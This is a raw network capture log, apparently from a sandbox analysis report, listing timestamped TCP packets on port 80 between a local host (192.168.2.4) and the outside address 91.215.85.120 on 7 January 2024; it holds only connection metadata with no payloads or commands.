                                                                                                                                                                    Jan 7, 2024 05:29:42.314148903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.314187050 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.316611052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.316715002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.316772938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.318047047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.318101883 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.318124056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.318185091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.318212986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.318386078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.318430901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.318873882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.327668905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.327759027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.388164997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.388237000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.388288021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.453402042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.453417063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.453490019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.454505920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.454585075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.454628944 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.506042957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.506170034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.506203890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.506351948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.508811951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.508924961 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.509095907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.512300014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.512366056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.512392998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.513685942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.513767958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.513806105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.513830900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.513906956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.522118092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.522134066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.522233963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.582865000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.582909107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.582945108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.582994938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.583004951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.583034039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.647068024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.647136927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.647304058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.648535013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.648574114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.648668051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.700470924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.700544119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.700615883 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.703006983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.703054905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.703107119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.703119993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.706352949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.706366062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.706440926 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.708091974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.708164930 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.708187103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.708296061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.708348036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.708353043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.715915918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.716017008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.716048956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.778203964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.778258085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.778285980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.778424978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.778470039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.778496027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.842365026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.842422962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.842431068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.844218016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.844261885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.844261885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.897062063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.897099972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.897236109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.897243977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.897283077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.897335052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.899154902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.899204016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.899214983 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.902750015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.902812004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.902853012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.904323101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.904371977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.904407024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.904479980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.904506922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.904526949 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.910967112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.911031008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.911082983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.972764015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.972903013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.973040104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.973092079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:42.973146915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:42.973150969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.036190033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.036242962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.036294937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.038783073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.038825989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.039015055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.091083050 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.091200113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.091219902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.091276884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.091339111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.091403008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.091439962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.092835903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.092884064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.092927933 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.098150015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.098218918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.098265886 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.100083113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.100155115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.100199938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.100227118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.100305080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.100347042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.100414038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.105317116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.105356932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.105376005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.166939974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.167000055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.167032003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.167054892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.167068958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.167097092 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.216133118 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.230551004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.231017113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.231203079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.233094931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.233257055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.233314037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.286251068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.286272049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.286283970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.286309958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.286323071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.286425114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.286489010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.286489010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.287877083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.287911892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.287913084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.287965059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.293206930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.293220997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.293263912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.295972109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.295984983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.296055079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.296231985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.296246052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.296287060 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.300889969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.300903082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.300950050 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.361135960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.361152887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.361191988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.361237049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.361361027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.361361027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.412107944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.425935984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.425997972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.426111937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.428788900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.428838968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.428941965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.481137991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.481194019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.481211901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.481255054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.481297016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.481329918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.481375933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.481415033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.481432915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.482498884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.482541084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.482572079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.482670069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.482707024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.487818003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.487879038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.487924099 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.490602016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.490772963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.490814924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.490839005 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.490926027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.490962982 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.496299982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.496325970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.496366978 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.556979895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.557054043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.557113886 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.557132959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.557210922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.557245016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.622751951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.622853994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.623019934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.625596046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.625701904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.625751019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.676265955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.676345110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.676413059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.676434994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.676500082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.676635027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.676831961 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.676933050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.676974058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.677763939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.677823067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.677867889 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.677911997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.677992105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.678030968 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.683162928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.683260918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.683305025 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.685921907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.686021090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.686072111 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.686381102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.686533928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.686578989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.692540884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.692658901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.692706108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.750895023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.750952959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.751040936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.751152039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.751163006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.751208067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.817081928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.817145109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.817197084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.819577932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.819694042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.819745064 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.819773912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.819911003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.819952011 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.870661974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.870676994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.870817900 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.870852947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.870939016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.871090889 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.871140957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.871267080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.871309042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.871936083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.871972084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.872001886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.872019053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.878088951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.878145933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.878151894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.880585909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.880599022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.880631924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.880795956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.880840063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.880934954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.886437893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.886487961 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:43.886528015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.944835901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.944854021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.944866896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:43.944879055 CET804973591.215.85.120192.168.2.4
